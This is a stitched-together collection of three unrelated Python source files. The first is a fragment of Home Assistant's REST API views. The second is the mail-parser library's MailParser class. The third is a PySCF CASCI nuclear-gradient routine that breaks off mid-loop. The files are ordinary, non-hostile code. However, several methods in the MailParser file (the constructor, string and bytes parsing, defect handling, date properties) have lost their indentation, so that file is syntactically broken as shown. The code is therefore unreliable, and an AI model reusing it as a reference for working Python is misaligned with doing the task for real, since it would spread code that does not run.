        if state := request.app["hass"].states.get(entity_id):
            return self.json(state)
        return self.json_message("Entity not found.", HTTPStatus.NOT_FOUND)

    async def post(self, request, entity_id):
        """Update state of entity.

        Admin only. JSON body must contain a "state" key; "attributes" and
        "force_update" are optional. Responds 201 when the entity is created,
        200 when an existing entity is updated.
        """
        if not request["hass_user"].is_admin:
            raise Unauthorized(entity_id=entity_id)
        hass = request.app["hass"]
        try:
            data = await request.json()
        except ValueError:
            return self.json_message("Invalid JSON specified.", HTTPStatus.BAD_REQUEST)
        if (new_state := data.get("state")) is None:
            return self.json_message("No state specified.", HTTPStatus.BAD_REQUEST)
        attributes = data.get("attributes")
        force_update = data.get("force_update", False)
        # Determine created-vs-updated before writing the state.
        is_new_state = hass.states.get(entity_id) is None
        # Write state
        hass.states.async_set(
            entity_id, new_state, attributes, force_update, self.context(request)
        )
        # Read the state back for our response
        status_code = HTTPStatus.CREATED if is_new_state else HTTPStatus.OK
        resp = self.json(hass.states.get(entity_id), status_code)
        resp.headers.add("Location", f"/api/states/{entity_id}")
        return resp

    @ha.callback
    def delete(self, request, entity_id):
        """Remove entity.

        Admin only; 404 when the entity does not exist.
        """
        if not request["hass_user"].is_admin:
            raise Unauthorized(entity_id=entity_id)
        if request.app["hass"].states.async_remove(entity_id):
            return self.json_message("Entity removed.")
        return self.json_message("Entity not found.", HTTPStatus.NOT_FOUND)
class APIEventListenersView(HomeAssistantView):
    """Expose the active event listeners."""

    url = URL_API_EVENTS
    name = "api:event-listeners"

    @ha.callback
    def get(self, request):
        """Return event types with their listener counts."""
        hass = request.app["hass"]
        return self.json(async_events_json(hass))
class APIEventView(HomeAssistantView):
    """View to handle Event requests."""

    url = "/api/events/{event_type}"
    name = "api:event"

    async def post(self, request, event_type):
        """Fire events.

        Admin only. The optional JSON body becomes the event data and must be
        a JSON object when present.
        """
        if not request["hass_user"].is_admin:
            raise Unauthorized()
        body = await request.text()
        try:
            event_data = json.loads(body) if body else None
        except ValueError:
            return self.json_message(
                "Event data should be valid JSON.", HTTPStatus.BAD_REQUEST
            )
        if event_data is not None and not isinstance(event_data, dict):
            return self.json_message(
                "Event data should be a JSON object", HTTPStatus.BAD_REQUEST
            )
        # Special case handling for event STATE_CHANGED
        # We will try to convert state dicts back to State objects
        if event_type == ha.EVENT_STATE_CHANGED and event_data:
            for key in ("old_state", "new_state"):
                state = ha.State.from_dict(event_data.get(key))
                if state:
                    event_data[key] = state
        # Fire as remote-origin, tied to this request's context.
        request.app["hass"].bus.async_fire(
            event_type, event_data, ha.EventOrigin.remote, self.context(request)
        )
        return self.json_message(f"Event {event_type} fired.")
class APIServicesView(HomeAssistantView):
    """Expose the registered service registry."""

    url = URL_API_SERVICES
    name = "api:services"

    async def get(self, request):
        """Return all registered services grouped by domain."""
        hass = request.app["hass"]
        return self.json(await async_services_json(hass))
class APIDomainServicesView(HomeAssistantView):
    """Call a service over HTTP."""

    url = "/api/services/{domain}/{service}"
    name = "api:domain-services"

    async def post(self, request, domain, service):
        """Call a service.

        Returns a list of changed states.
        """
        hass: ha.HomeAssistant = request.app["hass"]
        body = await request.text()
        if body:
            try:
                data = json.loads(body)
            except ValueError:
                return self.json_message(
                    "Data should be valid JSON.", HTTPStatus.BAD_REQUEST
                )
        else:
            data = None
        context = self.context(request)
        try:
            await hass.services.async_call(
                domain, service, data, blocking=True, context=context
            )
        except (vol.Invalid, ServiceNotFound) as ex:
            raise HTTPBadRequest() from ex
        # States touched by this call carry exactly our context object.
        changed_states = [
            state for state in hass.states.async_all() if state.context is context
        ]
        return self.json(changed_states)
class APIComponentsView(HomeAssistantView):
    """Expose the set of loaded components."""

    url = URL_API_COMPONENTS
    name = "api:components"

    @ha.callback
    def get(self, request):
        """Return the currently loaded components."""
        hass = request.app["hass"]
        return self.json(hass.config.components)
class APITemplateView(HomeAssistantView):
    """View to handle Template requests."""

    url = URL_API_TEMPLATE
    name = "api:template"

    async def post(self, request):
        """Render a template.

        Admin only. Expects a JSON body with a "template" string and an
        optional "variables" mapping.
        """
        if not request["hass_user"].is_admin:
            raise Unauthorized()
        try:
            data = await request.json()
            tpl = template.Template(data["template"], request.app["hass"])
            return tpl.async_render(variables=data.get("variables"), parse_result=False)
        # KeyError: body without a "template" key previously escaped as an
        # unhandled 500; report it as a 400 like the other input errors.
        except (ValueError, TemplateError, KeyError) as ex:
            return self.json_message(
                f"Error rendering template: {ex}", HTTPStatus.BAD_REQUEST
            )
class APIErrorLog(HomeAssistantView):
    """View to fetch the API error log."""

    url = URL_API_ERROR_LOG
    name = "api:error_log"

    async def get(self, request):
        """Retrieve API error log.

        Admin only; serves the log file path stored under DATA_LOGGING.
        """
        # pylint: disable=no-self-use
        if not request["hass_user"].is_admin:
            raise Unauthorized()
        return web.FileResponse(request.app["hass"].data[DATA_LOGGING])
async def async_services_json(hass):
    """Generate services data to JSONify."""
    descriptions = await async_get_all_descriptions(hass)
    return [
        {"domain": domain, "services": services}
        for domain, services in descriptions.items()
    ]
@ha.callback
def async_events_json(hass):
    """Generate event data to JSONify."""
    listeners = hass.bus.async_listeners()
    return [
        {"event": event_type, "listener_count": count}
        for event_type, count in listeners.items()
    ]
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright 2016 Fedele Mantuano (https://twitter.com/fedelemantuano)
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import unicode_literals
import base64
import email
import logging
import os
import ipaddress
import six
import simplejson as json
from .const import (
ADDRESSES_HEADERS,
EPILOGUE_DEFECTS,
REGXIP)
from .utils import (
convert_mail_date,
decode_header_part,
find_between,
get_header,
get_mail_keys,
get_to_domains,
msgconvert,
ported_open,
ported_string,
random_string,
receiveds_parsing,
write_attachments,
)
from .exceptions import MailParserEnvironmentError
log = logging.getLogger(__name__)
def parse_from_file_obj(fp):
    """
    Parse a raw email from a file-like object.

    Args:
        fp (file-like object): file-like object of raw email

    Returns:
        Instance of MailParser with raw email parsed
    """
    mail = MailParser.from_file_obj(fp)
    return mail
def parse_from_file(fp):
    """
    Parse a raw email stored at a file path.

    Args:
        fp (string): file path of raw email

    Returns:
        Instance of MailParser with raw email parsed
    """
    mail = MailParser.from_file(fp)
    return mail
def parse_from_file_msg(fp):
    """
    Parse a raw Outlook email (.msg) stored at a file path.

    Args:
        fp (string): file path of raw Outlook email

    Returns:
        Instance of MailParser with raw email parsed
    """
    mail = MailParser.from_file_msg(fp)
    return mail
def parse_from_string(s):
    """
    Parse a raw email given as a string.

    Args:
        s (string): raw email

    Returns:
        Instance of MailParser with raw email parsed
    """
    mail = MailParser.from_string(s)
    return mail
def parse_from_bytes(bt):
    """
    Parse a raw email given as bytes. Only for Python 3.

    Args:
        bt (bytes-like object): raw email as bytes-like object

    Returns:
        Instance of MailParser with raw email parsed
    """
    mail = MailParser.from_bytes(bt)
    return mail
class MailParser(object):
"""
MailParser package provides a standard parser that understands
most email document structures like official email package.
MailParser handles the encoding of email and split the raw email for you.
Headers:
https://www.iana.org/assignments/message-headers/message-headers.xhtml
"""
def __init__(self, message=None):
"""
Init a new object from a message object structure.
"""
self._message = message
log.debug(
"All headers of emails: {}".format(", ".join(message.keys())))
self.parse()
def __str__(self):
if self.message:
return self.subject
else:
return six.text_type()
    @classmethod
    def from_file_obj(cls, fp):
        """
        Init a new object from a file-like object.
        Not for Outlook msg.

        Args:
            fp (file-like object): file-like object of raw email

        Returns:
            Instance of MailParser
        """
        log.debug("Parsing email from file object")
        try:
            fp.seek(0)
        except IOError:
            # When stdout is a TTY it's a character device
            # and it's not seekable, you cannot seek in a TTY.
            pass
        finally:
            # the read happens whether or not seek succeeded; a non-IOError
            # from seek still propagates after the read in finally
            s = fp.read()
        return cls.from_string(s)
    @classmethod
    def from_file(cls, fp, is_outlook=False):
        """
        Init a new object from a file path.

        Args:
            fp (string): file path of raw email
            is_outlook (boolean): if True is an Outlook email

        Returns:
            Instance of MailParser
        """
        log.debug("Parsing email from file {!r}".format(fp))
        with ported_open(fp) as f:
            message = email.message_from_file(f)
        if is_outlook:
            # the file is a temporary conversion artifact (see
            # from_file_msg); remove it once parsed
            log.debug("Removing temp converted Outlook email {!r}".format(fp))
            os.remove(fp)
        return cls(message)
    @classmethod
    def from_file_msg(cls, fp):
        """
        Init a new object from a Outlook message file,
        mime type: application/vnd.ms-outlook

        Args:
            fp (string): file path of raw Outlook email

        Returns:
            Instance of MailParser
        """
        log.debug("Parsing email from file Outlook")
        # msgconvert writes a converted RFC 2822 copy to a temporary file;
        # from_file(..., True) deletes it again after parsing
        f, _ = msgconvert(fp)
        return cls.from_file(f, True)
@classmethod
def from_string(cls, s):
"""
Init a new object from a string.
Args:
s (string): raw email
Returns:
Instance of MailParser
"""
log.debug("Parsing email from string")
message = email.message_from_string(s)
return cls(message)
@classmethod
def from_bytes(cls, bt):
"""
Init a new object from bytes.
Args:
bt (bytes-like object): raw email as bytes-like object
Returns:
Instance of MailParser
"""
log.debug("Parsing email from bytes")
if six.PY2:
raise MailParserEnvironmentError(
"Parsing from bytes is valid only for Python 3.x version")
message = email.message_from_bytes(bt)
return cls(message)
def _reset(self):
"""
Reset the state of mail object.
"""
log.debug("Reset all variables")
self._attachments = []
self._text_plain = []
self._text_html = []
self._text_not_managed = []
self._defects = []
self._defects_categories = set()
self._has_defects = False
def _append_defects(self, part, part_content_type):
"""
Add new defects and defects categories to object attributes.
The defects are a list of all the problems found
when parsing this message.
Args:
part (string): mail part
part_content_type (string): content type of part
"""
part_defects = {}
for e in part.defects:
defects = "{}: {}".format(e.__class__.__name__, e.__doc__)
self._defects_categories.add(e.__class__.__name__)
part_defects.setdefault(part_content_type, []).append(defects)
log.debug("Added defect {!r}".format(defects))
# Tag mail with defect
if part_defects:
self._has_defects = True
# Save all defects
self._defects.append(part_defects)
    def _make_mail(self, complete=True):
        """
        This method assigns the right values to all tokens of email.
        Returns a parsed object

        Keyword Arguments:
            complete {bool} -- If True returns all mails parts
                               (default: {True})

        Returns:
            dict -- Parsed email object
        """
        mail = {}
        keys = get_mail_keys(self.message, complete)
        for i in keys:
            log.debug("Getting header or part {!r}".format(i))
            # each key is resolved via attribute access (see __getattr__)
            value = getattr(self, i)
            # falsy values (empty lists/strings) are omitted from the result
            if value:
                mail[i] = value

        # add defects
        mail["has_defects"] = self.has_defects
        if self.has_defects:
            mail["defects"] = self.defects
            mail["defects_categories"] = list(self.defects_categories)
        return mail
    def parse(self):
        """
        This method parses the raw email and makes the tokens.

        Returns:
            self when there is no message to parse; otherwise None
            (the results are stored on the instance: attachments,
            text parts, defects, and the parsed mail dicts).
        """
        if not self.message:
            return self

        # reset and start parsing
        self._reset()
        parts = []  # Normal parts plus defects

        # walk all mail parts to search defects
        for p in self.message.walk():
            part_content_type = p.get_content_type()
            self._append_defects(p, part_content_type)
            parts.append(p)

        # If defects are in epilogue defects get epilogue
        if self.defects_categories & EPILOGUE_DEFECTS:
            log.debug("Found defects in emails")
            # carve the text between the boundary markers out of the
            # epilogue and re-parse it as its own message part
            epilogue = find_between(
                self.message.epilogue,
                "{}".format("--" + self.message.get_boundary()),
                "{}".format("--" + self.message.get_boundary() + "--"))

            try:
                p = email.message_from_string(epilogue)
                parts.append(p)
            except TypeError:
                log.debug("Failed to get epilogue part for TypeError")
            except Exception:
                log.error("Failed to get epilogue part. Check raw mail.")

        # walk all mail parts
        for i, p in enumerate(parts):
            if not p.is_multipart():
                charset = p.get_content_charset('utf-8')
                charset_raw = p.get_content_charset()
                log.debug("Charset {!r} part {!r}".format(charset, i))
                content_disposition = ported_string(
                    p.get('content-disposition'))
                log.debug("content-disposition {!r} part {!r}".format(
                    content_disposition, i))
                content_id = ported_string(p.get('content-id'))
                log.debug("content-id {!r} part {!r}".format(
                    content_id, i))
                content_subtype = ported_string(p.get_content_subtype())
                log.debug("content subtype {!r} part {!r}".format(
                    content_subtype, i))
                filename = decode_header_part(p.get_filename())

                is_attachment = False
                if filename:
                    is_attachment = True
                else:
                    # parts without a filename can still be attachments:
                    # inline content-id parts (not html/plain) and RTF bodies
                    if content_id and content_subtype not in ('html', 'plain'):
                        is_attachment = True
                        filename = content_id
                    elif content_subtype in ('rtf'):
                        # NOTE(review): ('rtf') is a plain string, not a
                        # tuple, so this membership test also matches the
                        # substrings 'r', 't', 'f', 'rt', 'tf' -- confirm
                        # whether a tuple was intended
                        is_attachment = True
                        filename = "{}.rtf".format(random_string())

                # this is an attachment
                if is_attachment:
                    log.debug("Email part {!r} is an attachment".format(i))
                    log.debug("Filename {!r} part {!r}".format(filename, i))
                    binary = False
                    mail_content_type = ported_string(p.get_content_type())
                    log.debug("Mail content type {!r} part {!r}".format(
                        mail_content_type, i))
                    transfer_encoding = ported_string(
                        p.get('content-transfer-encoding', '')).lower()
                    log.debug("Transfer encoding {!r} part {!r}".format(
                        transfer_encoding, i))
                    content_disposition = ported_string(
                        p.get('content-disposition'))
                    log.debug("content-disposition {!r} part {!r}".format(
                        content_disposition, i))

                    if transfer_encoding == "base64" or (
                            transfer_encoding == "quoted-\
printable" and "application" in mail_content_type):
                        # keep the payload in its wire encoding: binary
                        # attachments are stored as their raw base64/qp text
                        payload = p.get_payload(decode=False)
                        binary = True
                        log.debug("Filename {!r} part {!r} is binary".format(
                            filename, i))
                    elif "uuencode" in transfer_encoding:
                        # Re-encode in base64
                        payload = base64.b64encode(
                            p.get_payload(decode=True)).decode('ascii')
                        binary = True
                        transfer_encoding = "base64"
                        log.debug("Filename {!r} part {!r} is binary (uuencode"
                                  " re-encoded to base64)".format(filename, i))
                    else:
                        payload = ported_string(
                            p.get_payload(decode=True), encoding=charset)
                        log.debug(
                            "Filename {!r} part {!r} is not binary".format(
                                filename, i))

                    self._attachments.append({
                        "filename": filename,
                        "payload": payload,
                        "binary": binary,
                        "mail_content_type": mail_content_type,
                        "content-id": content_id,
                        "content-disposition": content_disposition,
                        "charset": charset_raw,
                        "content_transfer_encoding": transfer_encoding})
                # this isn't an attachment
                else:
                    log.debug("Email part {!r} is not an attachment".format(i))
                    # Get the payload using get_payload method with decode=True
                    # As Python truly decodes only 'base64',
                    # 'quoted-printable', 'x-uuencode',
                    # 'uuencode', 'uue', 'x-uue'
                    # And for other encodings it breaks the characters so
                    # we need to decode them with encoding python is applying
                    # To maintain the characters
                    payload = p.get_payload(decode=True)
                    cte = p.get('Content-Transfer-Encoding')
                    if cte:
                        cte = cte.lower()

                    if not cte or cte in ['7bit', '8bit']:
                        payload = payload.decode('raw-unicode-escape')
                    else:
                        payload = ported_string(payload, encoding=charset)

                    if payload:
                        if p.get_content_subtype() == 'html':
                            self._text_html.append(payload)
                        elif p.get_content_subtype() == 'plain':
                            self._text_plain.append(payload)
                        else:
                            log.warning(
                                'Email content {!r} not handled'.format(
                                    p.get_content_subtype()))
                            self._text_not_managed.append(payload)
        else:
            # for/else: there is no `break` in the loop above, so this
            # always runs once every part has been processed
            # Parsed object mail with all parts
            self._mail = self._make_mail()

            # Parsed object mail with mains parts
            self._mail_partial = self._make_mail(complete=False)
    def get_server_ipaddress(self, trust):
        """
        Return the ip address of sender

        Overview:
        Extract a reliable sender IP address heuristically for each message.
        Although the message format dictates a chain of relaying IP
        addresses in each message, a malicious relay can easily alter that.
        Therefore we cannot simply take the first IP in
        the chain. Instead, our method is as follows.
        First we trust the sender IP reported by our mail server in the
        Received headers, and if the previous relay IP address is on our trust
        list (e.g. other well-known mail services), we continue to
        follow the previous Received line, till we reach the first unrecognized
        IP address in the email header.

        From article Characterizing Botnets from Email Spam Records:
            Li Zhuang, J. D. Tygar

        In our case we trust only our mail server with the trust string.

        Args:
            trust (string): String that identify our mail server

        Returns:
            string with the ip address, or None when no trusted public
            sender IP is found
        """
        log.debug("Trust string is {!r}".format(trust))

        if not trust.strip():
            return

        received = self.message.get_all("received", [])
        for i in received:
            i = ported_string(i)
            if trust in i:
                log.debug("Trust string {!r} is in {!r}".format(trust, i))
                # only scan the text before "by": the sending relay side
                # of the Received header
                check = REGXIP.findall(i[0:i.find("by")])

                if check:
                    try:
                        ip_str = six.text_type(check[-1])
                        log.debug("Found sender IP {!r} in {!r}".format(
                            ip_str, i))
                        ip = ipaddress.ip_address(ip_str)
                    except ValueError:
                        # NOTE(review): an unparsable candidate returns None
                        # immediately instead of trying later Received
                        # headers -- confirm this is intended
                        return
                    else:
                        # private relay IPs are skipped; keep scanning the
                        # remaining Received headers
                        if not ip.is_private:
                            log.debug("IP {!r} not private".format(ip_str))
                            return ip_str
    def write_attachments(self, base_path):
        """ This method writes the attachments of mail on disk

        Arguments:
            base_path {str} -- Base path where write the attachments
        """
        # delegates to the module-level helper imported from .utils,
        # which shares this method's name
        write_attachments(
            attachments=self.attachments,
            base_path=base_path)
    def __getattr__(self, name):
        """Dynamic access to mail headers as attributes.

        Leading/trailing underscores are stripped and the name lowercased;
        then:
          * names ending in ``_json`` return a JSON dump of the parsed value
          * names ending in ``_raw`` return a JSON dump of the raw values
          * address headers (in ADDRESSES_HEADERS) are decoded and split
            into (realname, address) pairs
          * anything else is returned via get_header
        """
        name = name.strip("_").lower()
        name_header = name.replace("_", "-")

        # json headers
        if name.endswith("_json"):
            name = name[:-5]
            return json.dumps(getattr(self, name), ensure_ascii=False)

        # raw headers
        elif name.endswith("_raw"):
            name = name[:-4]
            raw = self.message.get_all(name)
            return json.dumps(raw, ensure_ascii=False)

        # object headers
        elif name_header in ADDRESSES_HEADERS:
            h = decode_header_part(self.message.get(
                name_header, six.text_type()))
            return email.utils.getaddresses([h])

        # others headers
        else:
            return get_header(self.message, name_header)
    @property
    def attachments(self):
        """
        Return a list of all attachments in the mail
        (dicts built by parse(): filename, payload, encoding, ...).
        """
        return self._attachments

    @property
    def received(self):
        """
        Return a list of all received headers parsed
        """
        output = self.received_raw
        return receiveds_parsing(output)

    @property
    def received_json(self):
        """
        Return a JSON of all received headers
        """
        return json.dumps(self.received, ensure_ascii=False, indent=2)

    @property
    def received_raw(self):
        """
        Return a list of all received headers in raw format
        (decoded but not parsed into fields).
        """
        output = []
        for i in self.message.get_all("received", []):
            output.append(decode_header_part(i))
        return output
    @property
    def body(self):
        """
        Return all text plain and text html parts of mail delimited from string
        "--- mail_boundary ---"
        """
        return "\n--- mail_boundary ---\n".join(
            self.text_plain + self.text_html + self.text_not_managed)

    @property
    def headers(self):
        """
        Return only the headers as Python object
        (each value resolved via attribute access, see __getattr__).
        """
        d = {}
        for i in self.message.keys():
            d[i] = getattr(self, i)
        return d

    @property
    def headers_json(self):
        """
        Return the JSON of headers
        """
        return json.dumps(self.headers, ensure_ascii=False, indent=2)

    @property
    def text_plain(self):
        """
        Return a list of all text plain parts of email.
        """
        return self._text_plain

    @property
    def text_html(self):
        """
        Return a list of all text html parts of email.
        """
        return self._text_html

    @property
    def text_not_managed(self):
        """
        Return a list of all text not managed of email.
        """
        return self._text_not_managed
@property
def date(self):
"""
Return the mail date in datetime.datetime format and UTC.
"""
date = self.message.get('date')
conv = None
try:
conv, _ = convert_mail_date(date)
finally:
return conv
@property
def timezone(self):
"""
Return timezone. Offset from UTC.
"""
date = self.message.get('date')
timezone = 0
try:
_, timezone = convert_mail_date(date)
finally:
return timezone
    @property
    def date_json(self):
        """
        Return the JSON of date, or None when no date is available.
        """
        if self.date:
            return json.dumps(self.date.isoformat(), ensure_ascii=False)

    @property
    def mail(self):
        """
        Return the Python object of mail parsed
        """
        return self._mail

    @property
    def mail_json(self):
        """
        Return the JSON of mail parsed.
        NOTE: replaces self._mail["date"] with its ISO string in place.
        """
        if self.mail.get("date"):
            self._mail["date"] = self.date.isoformat()
        return json.dumps(self.mail, ensure_ascii=False, indent=2)

    @property
    def mail_partial(self):
        """
        Return the Python object of mail parsed
        with only the mains headers
        """
        return self._mail_partial

    @property
    def mail_partial_json(self):
        """
        Return the JSON of mail parsed partial.
        NOTE: replaces self._mail_partial["date"] in place, like mail_json.
        """
        if self.mail_partial.get("date"):
            self._mail_partial["date"] = self.date.isoformat()
        return json.dumps(self.mail_partial, ensure_ascii=False, indent=2)
    @property
    def defects(self):
        """
        The defects property contains a list of
        all the problems found when parsing this message.
        """
        return self._defects

    @property
    def defects_categories(self):
        """
        Return a set with only defects categories
        (the defect class names collected during parsing).
        """
        return self._defects_categories

    @property
    def has_defects(self):
        """
        Return a boolean: True if mail has defects.
        """
        return self._has_defects

    @property
    def message(self):
        """
        email.message.Message class.
        """
        return self._message

    @property
    def message_as_string(self):
        """
        Return the entire message flattened as a string.
        """
        return self.message.as_string()

    @property
    def to_domains(self):
        """
        Return all domain of 'to' and 'reply-to' email addresses
        """
        return get_to_domains(self.to, self.reply_to)
| |
#!/usr/bin/env python
# Copyright 2014-2020 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Qiming Sun <osirpt.sun@gmail.com>
#
'''
CASCI analytical nuclear gradients
Ref.
J. Comput. Chem., 5, 589
'''
import sys
import time
from functools import reduce
import numpy
from pyscf import lib
from pyscf import ao2mo
from pyscf.lib import logger
from pyscf.grad import rhf as rhf_grad
from pyscf.grad.mp2 import _shell_prange
from pyscf.scf import cphf
# Type used by Gradients.kernel to recognize a multi-root `ci` container:
# Python 3 range objects are not lists, so accept both.
if sys.version_info < (3,):
    RANGE_TYPE = list
else:
    RANGE_TYPE = range
def grad_elec(mc_grad, mo_coeff=None, ci=None, atmlst=None, verbose=None):
    '''Electronic part of the CASCI analytical nuclear gradients.

    Args:
        mc_grad : Gradients object; mc_grad.base is the CASCI calculation.
        mo_coeff : MO coefficients (default: the underlying SCF MOs).
        ci : CI vector of the target state (default: mc.ci).
        atmlst : atom indices to compute gradients for (default: all atoms).
        verbose : verbosity level passed to the logger.

    Returns:
        numpy array of shape (len(atmlst), 3) with the electronic gradient.
    '''
    mc = mc_grad.base
    if mo_coeff is None: mo_coeff = mc._scf.mo_coeff
    if ci is None: ci = mc.ci
    # BUGFIX: time.clock() was removed in Python 3.8; use process_time when
    # available and fall back to clock only on old interpreters.
    if hasattr(time, 'process_time'):
        time0 = time.process_time(), time.time()
    else:
        time0 = time.clock(), time.time()
    log = logger.new_logger(mc_grad, verbose)
    mol = mc_grad.mol
    ncore = mc.ncore
    ncas = mc.ncas
    nocc = ncore + ncas
    nelecas = mc.nelecas
    nao, nmo = mo_coeff.shape
    nao_pair = nao * (nao+1) // 2
    mo_energy = mc._scf.mo_energy

    mo_occ = mo_coeff[:,:nocc]
    mo_core = mo_coeff[:,:ncore]
    mo_cas = mo_coeff[:,ncore:nocc]
    neleca, nelecb = mol.nelec
    assert neleca == nelecb  # closed-shell RHF reference only
    orbo = mo_coeff[:,:neleca]
    orbv = mo_coeff[:,neleca:]

    casdm1, casdm2 = mc.fcisolver.make_rdm12(ci, ncas, nelecas)
    # AO-basis one-particle density matrices of core and active spaces
    dm_core = numpy.dot(mo_core, mo_core.T) * 2
    dm_cas = reduce(numpy.dot, (mo_cas, casdm1, mo_cas.T))
    aapa = ao2mo.kernel(mol, (mo_cas, mo_cas, mo_coeff, mo_cas), compact=False)
    aapa = aapa.reshape(ncas,ncas,nmo,ncas)
    vj, vk = mc._scf.get_jk(mol, (dm_core, dm_cas))
    h1 = mc.get_hcore()
    vhf_c = vj[0] - vk[0] * .5
    vhf_a = vj[1] - vk[1] * .5
    # Imat = h1_{pi} gamma1_{iq} + h2_{pijk} gamma_{iqkj}
    Imat = numpy.zeros((nmo,nmo))
    Imat[:,:nocc] = reduce(numpy.dot, (mo_coeff.T, h1 + vhf_c + vhf_a, mo_occ)) * 2
    Imat[:,ncore:nocc] = reduce(numpy.dot, (mo_coeff.T, h1 + vhf_c, mo_cas, casdm1))
    Imat[:,ncore:nocc] += lib.einsum('uviw,vuwt->it', aapa, casdm2)
    aapa = vj = vk = vhf_c = vhf_a = h1 = None

    # Z-vector (orbital response): trivially decoupled rotations first
    ee = mo_energy[:,None] - mo_energy
    zvec = numpy.zeros_like(Imat)
    zvec[:ncore,ncore:neleca] = Imat[:ncore,ncore:neleca] / -ee[:ncore,ncore:neleca]
    zvec[ncore:neleca,:ncore] = Imat[ncore:neleca,:ncore] / -ee[ncore:neleca,:ncore]
    zvec[nocc:,neleca:nocc] = Imat[nocc:,neleca:nocc] / -ee[nocc:,neleca:nocc]
    zvec[neleca:nocc,nocc:] = Imat[neleca:nocc,nocc:] / -ee[neleca:nocc,nocc:]

    zvec_ao = reduce(numpy.dot, (mo_coeff, zvec+zvec.T, mo_coeff.T))
    vhf = mc._scf.get_veff(mol, zvec_ao) * 2
    xvo = reduce(numpy.dot, (orbv.T, vhf, orbo))
    xvo += Imat[neleca:,:neleca] - Imat[:neleca,neleca:].T

    # ... then the occupied-virtual block via the CPHF equations
    def fvind(x):
        # response potential for the CPHF solver
        x = x.reshape(xvo.shape)
        dm = reduce(numpy.dot, (orbv, x, orbo.T))
        v = mc._scf.get_veff(mol, dm + dm.T)
        v = reduce(numpy.dot, (orbv.T, v, orbo))
        return v * 2
    dm1resp = cphf.solve(fvind, mo_energy, mc._scf.mo_occ, xvo, max_cycle=30)[0]
    zvec[neleca:,:neleca] = dm1resp

    # energy-weighted contributions for the overlap-derivative terms
    zeta = numpy.einsum('ij,j->ij', zvec, mo_energy)
    zeta = reduce(numpy.dot, (mo_coeff, zeta, mo_coeff.T))

    zvec_ao = reduce(numpy.dot, (mo_coeff, zvec+zvec.T, mo_coeff.T))
    p1 = numpy.dot(mo_coeff[:,:neleca], mo_coeff[:,:neleca].T)
    vhf_s1occ = reduce(numpy.dot, (p1, mc._scf.get_veff(mol, zvec_ao), p1))

    Imat[:ncore,ncore:neleca] = 0
    Imat[ncore:neleca,:ncore] = 0
    Imat[nocc:,neleca:nocc] = 0
    Imat[neleca:nocc,nocc:] = 0
    Imat[neleca:,:neleca] = Imat[:neleca,neleca:].T
    im1 = reduce(numpy.dot, (mo_coeff, Imat, mo_coeff.T))

    casci_dm1 = dm_core + dm_cas
    hf_dm1 = mc._scf.make_rdm1(mo_coeff, mc._scf.mo_occ)
    hcore_deriv = mc_grad.hcore_generator(mol)
    s1 = mc_grad.get_ovlp(mol)

    # pack the symmetrized active-space 2-RDM into AO triangular form
    diag_idx = numpy.arange(nao)
    diag_idx = diag_idx * (diag_idx+1) // 2 + diag_idx
    casdm2_cc = casdm2 + casdm2.transpose(0,1,3,2)
    dm2buf = ao2mo._ao2mo.nr_e2(casdm2_cc.reshape(ncas**2,ncas**2), mo_cas.T,
                                (0, nao, 0, nao)).reshape(ncas**2,nao,nao)
    dm2buf = lib.pack_tril(dm2buf)
    dm2buf[:,diag_idx] *= .5
    dm2buf = dm2buf.reshape(ncas,ncas,nao_pair)
    casdm2 = casdm2_cc = None

    if atmlst is None:
        atmlst = range(mol.natm)
    aoslices = mol.aoslice_by_atom()
    de = numpy.zeros((len(atmlst),3))

    # block size chosen so one (3, p1-p0, nf, nao_pair) integral batch fits
    # in 90% of the remaining memory budget
    max_memory = mc_grad.max_memory - lib.current_memory()[0]
    blksize = int(max_memory*.9e6/8 / ((aoslices[:,3]-aoslices[:,2]).max()*nao_pair))
    blksize = min(nao, max(2, blksize))

    for k, ia in enumerate(atmlst):
        shl0, shl1, p0, p1 = aoslices[ia]
        h1ao = hcore_deriv(ia)
        de[k] += numpy.einsum('xij,ij->x', h1ao, casci_dm1)
        de[k] += numpy.einsum('xij,ij->x', h1ao, zvec_ao)

        # NOTE: removed unused local `vhf1 = numpy.zeros((3,nao,nao))`
        q1 = 0
        for b0, b1, nf in _shell_prange(mol, 0, mol.nbas, blksize):
            q0, q1 = q1, q1 + nf
            dm2_ao = lib.einsum('ijw,pi,qj->pqw', dm2buf, mo_cas[p0:p1], mo_cas[q0:q1])
            shls_slice = (shl0,shl1,b0,b1,0,mol.nbas,0,mol.nbas)
            eri1 = mol.intor('int2e_ip1', comp=3, aosym='s2kl',
                             shls_slice=shls_slice).reshape(3,p1-p0,nf,nao_pair)
            de[k] -= numpy.einsum('xijw,ijw->x', eri1, dm2_ao) * 2

            for i in range(3):
                eri1tmp = lib.unpack_tril(eri1[i].reshape((p1-p0)*nf,-1))
                eri1tmp = eri1tmp.reshape(p1-p0,nf,nao,nao)
                de[k,i] -= numpy.einsum('ijkl,ij,kl', eri1tmp, hf_dm1[p0:p1,q0:q1], zvec_ao) * 2
                de[k,i] -= numpy.einsum('ijkl,kl,ij', eri1tmp, hf_dm1, zvec_ao[p0:p1,q0:q1]) * 2
                de[k,i] += numpy.einsum('ijkl,il,kj', eri1tmp, hf_dm1[p0:p1], zvec_ao[q0:q1])
                de[k,i] += numpy.einsum('ijkl,jk,il', eri1tmp, hf_dm1[q0:q1], zvec_ao[p0:p1])

                #:vhf1c, vhf1a = mc_grad.get_veff(mol, (dm_core, dm_cas))
                #:de[k] += numpy.einsum('xij,ij->x', vhf1c[:,p0:p1], casci_dm1[p0:p1]) * 2
                #:de[k] += numpy.einsum('xij,ij->x', vhf1a[:,p0:p1], dm_core[p0:p1]) * 2
                de[k,i] -= numpy.einsum('ijkl,lk,ij', eri1tmp, dm_core[q0:q1], casci_dm1[p0:p1]) * 2
